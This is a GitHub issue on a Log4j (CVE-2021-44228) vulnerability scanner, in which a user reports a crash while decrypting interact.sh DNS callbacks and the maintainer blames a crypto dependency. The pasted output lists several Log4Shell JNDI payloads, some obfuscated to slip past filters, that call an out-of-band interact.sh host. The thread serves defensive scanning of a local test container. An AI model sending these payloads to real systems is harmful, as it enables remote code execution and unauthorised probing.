fullhunt / log4j-scan

A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
MIT License

ValueError: Input strings must be a multiple of the segment size 16 in length when getting response from interact.sh #93

Closed framegrace closed 2 years ago

framegrace commented 2 years ago

Been trying the scanner on a vulnerable container, and when receiving the DNS callback I get this error: (Only happens on vulnerable hosts)


```
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: http://localhost:8080
[•] URL: http://localhost:8080 | PAYLOAD: ${jndi:ldap://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${::-j}ndi:rmi://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${jndi:rmi://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh}
[•] URL: http://localhost:8080 | PAYLOAD: ${${lower:jndi}:${lower:rmi}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${lower:${lower:jndi}}:${lower:rmi}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh/dtrry9j}
[•] URL: http://localhost:8080 | PAYLOAD: ${jndi:dns://localhost.1f510if35g814890896ybog35n0695p9u.interact.sh}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
Traceback (most recent call last):
  File "log4j-scan.py", line 387, in <module>
    main()
  File "log4j-scan.py", line 376, in main
    records = dns_callback.pull_logs()
  File "log4j-scan.py", line 234, in pull_logs
    decrypt_data = self.__decrypt_data(aes_key, i)
  File "log4j-scan.py", line 247, in __decrypt_data
    plain_text = cryptor.decrypt(decode)
  File "/usr/lib/python3/dist-packages/Crypto/Cipher/blockalgo.py", line 295, in decrypt
    return self._cipher.decrypt(ciphertext)
ValueError: Input strings must be a multiple of the segment size 16 in length
```

mazen160 commented 2 years ago

@framegrace It seems to be a dependency issue. Can you please use the Docker image version of the tool for better execution? It would help out in avoiding similar issues related to pycryptodome.